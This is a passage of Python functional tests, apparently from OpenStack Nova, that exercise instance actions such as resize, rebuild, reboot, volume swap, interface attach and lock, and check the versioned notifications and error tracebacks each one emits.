@mock.patch('nova.compute.manager.ComputeManager._prep_resize')
def test_resize_server_error_and_reschedule_was_failed(
self, mock_prep_resize):
"""Test it, when the prep_resize method raise an exception,
after trying again with the reschedule_resize_or_reraise method
call, but the rescheduled also was unsuccessful. In this
case called the exception block.
In the exception block send a notification about error.
At end called raising an exception based on *exc_info,
which not send another error.
"""
def _build_resources(*args, **kwargs):
raise exception.FlavorDiskTooSmall()
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self.flags(allow_resize_to_same_host=True)
other_flavor_body = {
'flavor': {
'name': 'other_flavor_error',
'ram': 512,
'vcpus': 1,
'disk': 1,
'id': 'a22d5517-147c-4147-a0d1-e698df5cd4e9'
}
}
other_flavor_id = self.api.post_flavor(other_flavor_body)['id']
post = {
'resize': {
'flavorRef': other_flavor_id
}
}
self.notifier.reset()
mock_prep_resize.side_effect = _build_resources
# NOTE(gibi): the first resize_instance call (from the API) should be
# unaffected so that we can reach _prep_resize at all. But the
# subsequent resize_instance call (from _reschedule_resize_or_reraise)
# needs to fail. It isn't realistic that resize_instance would raise
# FlavorDiskTooSmall, but it's needed for the notification sample
# to work.
patcher = mock.patch.object(self.compute.manager.compute_task_api,
'resize_instance',
side_effect=_build_resources)
self.addCleanup(patcher.stop)
patcher.start()
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, expected_status='ERROR')
self._wait_for_notification('compute.exception')
# There should be the following notifications after scheduler's
# select_destination notifications:
# 0: instance-exists
# 1: instance-resize_prep-start
# 2: instance-resize-error
# 3: instance-resize_prep-end
# 4: compute.exception
# (via the wrap_exception decorator on
# the ComputeManager.prep_resize method.)
self._pop_and_verify_dest_select_notification(server['id'],
replacements={
'ignore_hosts': [],
'flavor.name': other_flavor_body['flavor']['name'],
'flavor.flavorid': other_flavor_id,
'flavor.extra_specs': {},
'requested_destination': self._build_destination_payload()})
self.assertEqual(5, len(self.notifier.versioned_notifications),
'Unexpected number of notifications: %s' %
self.notifier.versioned_notifications)
tb = self.notifier.versioned_notifications[2]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn("raise exception.FlavorDiskTooSmall()", tb)
self._verify_notification('instance-resize-error',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'fault.traceback': self.ANY
},
actual=self.notifier.versioned_notifications[2])
def _test_snapshot_server(self, server):
post = {'createImage': {'name': 'test-snap'}}
response = self.api.post_server_action(server['id'], post)
self._wait_for_notification('instance.snapshot.end')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-snapshot-start',
replacements={
'snapshot_image_id': response['image_id'],
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-snapshot-end',
replacements={
'snapshot_image_id': response['image_id'],
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def test_rebuild_server(self):
# NOTE(gabor_antal): Rebuild changes the image used by the instance,
# therefore the actions tested in test_instance_action had to be in
# specific order. To avoid this problem, rebuild was moved from
# test_instance_action to its own method.
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self.notifier.reset()
image_ref = 'a2459075-d96c-40d5-893e-577ff92e721c'
post = {
'rebuild': {
'imageRef': image_ref,
'metadata': {}
}
}
self.api.post_server_action(server['id'], post)
# Before going back to ACTIVE state
# server state need to be changed to REBUILD state
self._wait_for_state_change(server, expected_status='REBUILD')
self._wait_for_state_change(server, expected_status='ACTIVE')
self._pop_and_verify_dest_select_notification(server['id'],
replacements={
'image.container_format': 'ami',
'image.disk_format': 'ami',
'image.id': image_ref,
'image.properties': {
'nova_object.data': {},
'nova_object.name': 'ImageMetaPropsPayload',
'nova_object.namespace': 'nova',
'nova_object.version': '1.12',
},
'image.size': 58145823,
'image.tags': [],
'scheduler_hints': {'_nova_check_type': ['rebuild']},
'force_hosts': 'compute',
'force_nodes': 'fake-mini',
'requested_destination': self._build_destination_payload()})
# 0. instance.rebuild_scheduled
# 1. instance.exists
# 2. instance.rebuild.start
# 3. instance.detach.start
# 4. instance.detach.end
# 5. instance.rebuild.end
# The compute/manager will detach every volume during rebuild
self.assertEqual(6, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-rebuild_scheduled',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'trusted_image_certificates': None},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-rebuild-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'trusted_image_certificates': None},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-volume_detach-start',
replacements={
'reservation_id': server['reservation_id'],
'task_state': 'rebuilding',
'architecture': None,
'image_uuid': 'a2459075-d96c-40d5-893e-577ff92e721c',
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
self._verify_notification(
'instance-volume_detach-end',
replacements={
'reservation_id': server['reservation_id'],
'task_state': 'rebuilding',
'architecture': None,
'image_uuid': 'a2459075-d96c-40d5-893e-577ff92e721c',
'uuid': server['id']},
actual=self.notifier.versioned_notifications[4])
self._verify_notification(
'instance-rebuild-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'trusted_image_certificates': None},
actual=self.notifier.versioned_notifications[5])
def test_rebuild_server_with_trusted_cert(self):
# NOTE(gabor_antal): Rebuild changes the image used by the instance,
# therefore the actions tested in test_instance_action had to be in
# specific order. To avoid this problem, rebuild was moved from
# test_instance_action to its own method.
create_trusted_certs = ['cert-id-1', 'cert-id-2']
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}],
'trusted_image_certificates': create_trusted_certs})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self.notifier.reset()
image_ref = 'a2459075-d96c-40d5-893e-577ff92e721c'
rebuild_trusted_certs = ['rebuild-cert-id-1', 'rebuild-cert-id-2']
post = {
'rebuild': {
'imageRef': image_ref,
'metadata': {},
'trusted_image_certificates': rebuild_trusted_certs,
}
}
self.api.post_server_action(server['id'], post)
# Before going back to ACTIVE state
# server state need to be changed to REBUILD state
self._wait_for_state_change(server, expected_status='REBUILD')
self._wait_for_state_change(server, expected_status='ACTIVE')
self._pop_and_verify_dest_select_notification(server['id'],
replacements={
'image.container_format': 'ami',
'image.disk_format': 'ami',
'image.id': image_ref,
'image.properties': {
'nova_object.data': {},
'nova_object.name': 'ImageMetaPropsPayload',
'nova_object.namespace': 'nova',
'nova_object.version': '1.12',
},
'image.size': 58145823,
'image.tags': [],
'scheduler_hints': {'_nova_check_type': ['rebuild']},
'force_hosts': 'compute',
'force_nodes': 'fake-mini',
'requested_destination': self._build_destination_payload()})
# 0. instance.rebuild_scheduled
# 1. instance.exists
# 2. instance.rebuild.start
# 3. instance.detach.start
# 4. instance.detach.end
# 5. instance.rebuild.end
# The compute/manager will detach every volume during rebuild
self.assertEqual(6, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-rebuild_scheduled',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-rebuild-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-volume_detach-start',
replacements={
'reservation_id': server['reservation_id'],
'task_state': 'rebuilding',
'architecture': None,
'image_uuid': 'a2459075-d96c-40d5-893e-577ff92e721c',
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
self._verify_notification(
'instance-volume_detach-end',
replacements={
'reservation_id': server['reservation_id'],
'task_state': 'rebuilding',
'architecture': None,
'image_uuid': 'a2459075-d96c-40d5-893e-577ff92e721c',
'uuid': server['id']},
actual=self.notifier.versioned_notifications[4])
self._verify_notification(
'instance-rebuild-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
@mock.patch('nova.compute.manager.ComputeManager.'
'_do_rebuild_instance_with_claim')
def test_rebuild_server_exc(self, mock_rebuild):
def _virtual_interface_create_failed(*args, **kwargs):
# A real error that could come out of driver.spawn() during rebuild
raise exception.VirtualInterfaceCreateException()
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self.notifier.reset()
post = {
'rebuild': {
'imageRef': 'a2459075-d96c-40d5-893e-577ff92e721c',
'metadata': {}
}
}
self.api.post_server_action(server['id'], post)
mock_rebuild.side_effect = _virtual_interface_create_failed
self._wait_for_state_change(server, expected_status='ERROR')
notification = self._get_notifications('instance.rebuild.error')
self.assertEqual(1, len(notification),
self.notifier.versioned_notifications)
tb = notification[0]['payload']['nova_object.data']['fault'][
'nova_object.data']['traceback']
self.assertIn('raise exception.VirtualInterfaceCreateException()', tb)
self._verify_notification(
'instance-rebuild-error',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'trusted_image_certificates': None,
'fault.traceback': self.ANY},
actual=notification[0])
def _test_restore_server(self, server):
self.flags(reclaim_instance_interval=30)
self.api.delete_server(server['id'])
self._wait_for_state_change(server, 'SOFT_DELETED')
# we don't want to test soft_delete here
self.notifier.reset()
self.api.post_server_action(server['id'], {'restore': {}})
self._wait_for_state_change(server, 'ACTIVE')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-restore-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-restore-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def _test_reboot_server(self, server):
post = {'reboot': {'type': 'HARD'}}
self.api.post_server_action(server['id'], post)
self._wait_for_notification('instance.reboot.start')
self._wait_for_notification('instance.reboot.end')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-reboot-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-reboot-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
@mock.patch('nova.virt.fake.SmallFakeDriver.reboot')
def _test_reboot_server_error(self, server, mock_reboot):
def _hard_reboot(*args, **kwargs):
raise exception.UnsupportedVirtType(virt="FakeVirt")
mock_reboot.side_effect = _hard_reboot
post = {'reboot': {'type': 'HARD'}}
self.api.post_server_action(server['id'], post)
self._wait_for_notification('instance.reboot.start')
self._wait_for_notification('instance.reboot.error')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
tb = self.notifier.versioned_notifications[1]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn("raise exception.UnsupportedVirtType", tb)
self._verify_notification(
'instance-reboot-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-reboot-error',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'fault.traceback': self.ANY},
actual=self.notifier.versioned_notifications[1])
def _detach_volume_from_server(self, server, volume_id):
self.api.delete_server_volume(server['id'], volume_id)
self._wait_for_notification('instance.volume_detach.end')
def _volume_swap_server(self, server, attachment_id, volume_id):
self.api.put_server_volume(server['id'], attachment_id, volume_id)
def test_volume_swap_server(self):
server = self._boot_a_server(
extra_params={'networks':
[{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self.cinder.swap_volume_instance_uuid = server['id']
self._volume_swap_server(server, self.cinder.SWAP_OLD_VOL,
self.cinder.SWAP_NEW_VOL)
self._wait_until_swap_volume(server, self.cinder.SWAP_NEW_VOL)
# NOTE(gibi): the new volume id can appear on the API earlier than the
# volume_swap.end notification emitted. So to make the test stable
# we have to wait for the volume_swap.end notification directly.
self._wait_for_notification('instance.volume_swap.end')
self.assertEqual(7, len(self.notifier.versioned_notifications),
'Unexpected number of versioned notifications. '
'Got: %s' % self.notifier.versioned_notifications)
self._verify_notification(
'instance-volume_swap-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
self._verify_notification(
'instance-volume_swap-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[6])
def _do_setup_server_and_error_flag(self):
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_ERR_OLD_VOL)
self.cinder.attachment_error_id = self.cinder.SWAP_ERR_ATTACH_ID
return server
def test_volume_swap_server_with_error(self):
server = self._do_setup_server_and_error_flag()
self._volume_swap_server(server, self.cinder.SWAP_ERR_OLD_VOL,
self.cinder.SWAP_ERR_NEW_VOL)
self._wait_for_notification('compute.exception')
# Eight versioned notifications are generated.
# 0. instance-create-start
# 1. instance-create-end
# 2. instance-update
# 3. instance-volume_attach-start
# 4. instance-volume_attach-end
# 5. instance-volume_swap-start
# 6. instance-volume_swap-error
# 7. compute.exception
self.assertLessEqual(7, len(self.notifier.versioned_notifications),
'Unexpected number of versioned notifications. '
'Got: %s' % self.notifier.versioned_notifications)
block_devices = [{
"nova_object.data": {
"boot_index": None,
"delete_on_termination": False,
"device_name": "/dev/sdb",
"tag": None,
"volume_id": self.cinder.SWAP_ERR_OLD_VOL
},
"nova_object.name": "BlockDevicePayload",
"nova_object.namespace": "nova",
"nova_object.version": "1.0"
}]
self._verify_notification(
'instance-volume_swap-start',
replacements={
'new_volume_id': self.cinder.SWAP_ERR_NEW_VOL,
'old_volume_id': self.cinder.SWAP_ERR_OLD_VOL,
'block_devices': block_devices,
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
tb1 = self.notifier.versioned_notifications[6]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn("_swap_volume", tb1)
tb2 = self.notifier.versioned_notifications[7]['payload'][
'nova_object.data']['traceback']
self.assertIn("_swap_volume", tb2)
self._verify_notification(
'instance-volume_swap-error',
replacements={
'reservation_id': server['reservation_id'],
'block_devices': block_devices,
'uuid': server['id'],
'fault.traceback': self.ANY},
actual=self.notifier.versioned_notifications[6])
def test_resize_confirm_server(self):
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self.admin_api.post_extra_spec(
'2', {"extra_specs": {"hw:watchdog_action": "disabled"}})
self.flags(allow_resize_to_same_host=True)
post = {'resize': {'flavorRef': '2'}}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'VERIFY_RESIZE')
self.notifier.reset()
post = {'confirmResize': None}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'ACTIVE')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-resize_confirm-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-resize_confirm-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def _test_trigger_crash_dump(self, server):
post = {'trigger_crash_dump': None}
self.api.post_server_action(server['id'], post)
self._wait_for_notification('instance.trigger_crash_dump.end')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-trigger_crash_dump-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-trigger_crash_dump-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def _test_volume_detach_attach_server(self, server):
self._detach_volume_from_server(server, self.cinder.SWAP_OLD_VOL)
# 0. volume_detach-start
# 1. volume_detach-end
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-volume_detach-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-volume_detach-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self.notifier.reset()
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
# 0. volume_attach-start
# 1. volume_attach-end
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-volume_attach-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-volume_attach-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def _test_rescue_unrescue_server(self, server):
# Both "rescue" and "unrescue" notification asserts are made here
# rescue notification asserts
post = {
"rescue": {
"rescue_image_ref": 'a2459075-d96c-40d5-893e-577ff92e721c'
}
}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'RESCUE')
# 0. instance.rescue.start
# 1. instance.exists
# 2. instance.rescue.end
self.assertEqual(3, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-rescue-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-rescue-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self.notifier.reset()
# unrescue notification asserts
post = {
'unrescue': None
}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'ACTIVE')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-unrescue-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-unrescue-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def _test_soft_delete_server(self, server):
self.flags(reclaim_instance_interval=30)
self.api.delete_server(server['id'])
self._wait_for_state_change(server, 'SOFT_DELETED')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-soft_delete-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-soft_delete-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self.flags(reclaim_instance_interval=0)
# Leave instance in normal, active state
self.api.post_server_action(server['id'], {'restore': {}})
def _test_attach_volume_error(self, server):
def attach_volume(*args, **kwargs):
raise exception.CinderConnectionFailed(
reason="Connection timed out")
# Override the fixture's default implementation of this with our
# error-generating version.
cinder.API.attachment_update.side_effect = attach_volume
post = {"volumeAttachment": {"volumeId": self.cinder.SWAP_NEW_VOL}}
self.api.post_server_volume(server['id'], post)
self._wait_for_notification('instance.volume_attach.error')
block_devices = [
# Add by default at boot
{'nova_object.data': {'boot_index': None,
'delete_on_termination': False,
'tag': None,
'device_name': '/dev/sdb',
'volume_id': self.cinder.SWAP_OLD_VOL},
'nova_object.name': 'BlockDevicePayload',
'nova_object.namespace': 'nova',
'nova_object.version': '1.0'},
# Attaching it right now
{'nova_object.data': {'boot_index': None,
'delete_on_termination': False,
'tag': None,
'device_name': '/dev/sdc',
'volume_id': self.cinder.SWAP_NEW_VOL},
'nova_object.name': 'BlockDevicePayload',
'nova_object.namespace': 'nova',
'nova_object.version': '1.0'}]
# 0. volume_attach-start
# 1. volume_attach-error
# 2. compute.exception
# We only rely on the first 2 notifications, in this case we don't
# care about the exception notification.
self.assertLessEqual(2, len(self.notifier.versioned_notifications))
self._verify_notification(
'instance-volume_attach-start',
replacements={
'reservation_id': server['reservation_id'],
'block_devices': block_devices,
'volume_id': self.cinder.SWAP_NEW_VOL,
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
tb = self.notifier.versioned_notifications[1]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn("CinderConnectionFailed:", tb)
self._verify_notification(
'instance-volume_attach-error',
replacements={
'reservation_id': server['reservation_id'],
'block_devices': block_devices,
'volume_id': self.cinder.SWAP_NEW_VOL,
'uuid': server['id'],
'fault.traceback': self.ANY},
actual=self.notifier.versioned_notifications[1])
def _test_interface_attach_and_detach(self, server):
post = {
'interfaceAttachment': {
'net_id': fixtures.NeutronFixture.network_1['id']
}
}
self.api.attach_interface(server['id'], post)
self._wait_for_notification('instance.interface_attach.end')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-interface_attach-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-interface_attach-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self.notifier.reset()
self.assertEqual(0, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self.api.detach_interface(
server['id'],
fixtures.NeutronFixture.port_2['id'])
self._wait_for_notification('instance.interface_detach.end')
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-interface_detach-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-interface_detach-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
@mock.patch('nova.virt.fake.SmallFakeDriver.attach_interface')
def _test_interface_attach_error(self, server, mock_driver):
def _unsuccessful_attach_interface(*args, **kwargs):
raise exception.InterfaceAttachFailed("dummy")
mock_driver.side_effect = _unsuccessful_attach_interface
post = {
'interfaceAttachment': {
'net_id': fixtures.NeutronFixture.network_1['id']
}
}
self.assertRaises(
client.OpenStackApiException,
self.api.attach_interface, server['id'], post)
self._wait_for_notification('instance.interface_attach.error')
# 0. instance.interface_attach.start
# 1. instance.interface_attach.error
# 2. compute.exception
self.assertLessEqual(2, len(self.notifier.versioned_notifications))
self._verify_notification(
'instance-interface_attach-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
tb = self.notifier.versioned_notifications[1]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn("raise exception.InterfaceAttachFailed", tb)
self._verify_notification(
'instance-interface_attach-error',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'fault.traceback': self.ANY},
actual=self.notifier.versioned_notifications[1])
def _test_lock_unlock_instance(self, server):
self.api.post_server_action(server['id'], {'lock': {}})
self._wait_for_server_parameter(server, {'locked': True})
self.api.post_server_action(server['id'], {'unlock': {}})
self._wait_for_server_parameter(server, {'locked': False})
# Two versioned notifications are generated
# 0. instance-lock
# 1. instance-unlock
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-lock',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-unlock',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def _test_lock_unlock_instance_with_reason(self, server):
self.api.post_server_action(
server['id'], {'lock': {"locked_reason": "global warming"}})
self._wait_for_server_parameter(server, {'locked': True})
self.api.post_server_action(server['id'], {'unlock': {}})
self._wait_for_server_parameter(server, {'locked': False})
# Two versioned notifications are generated
# 0. instance-lock
# 1. instance-unlock
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-lock-with-reason',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-unlock',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.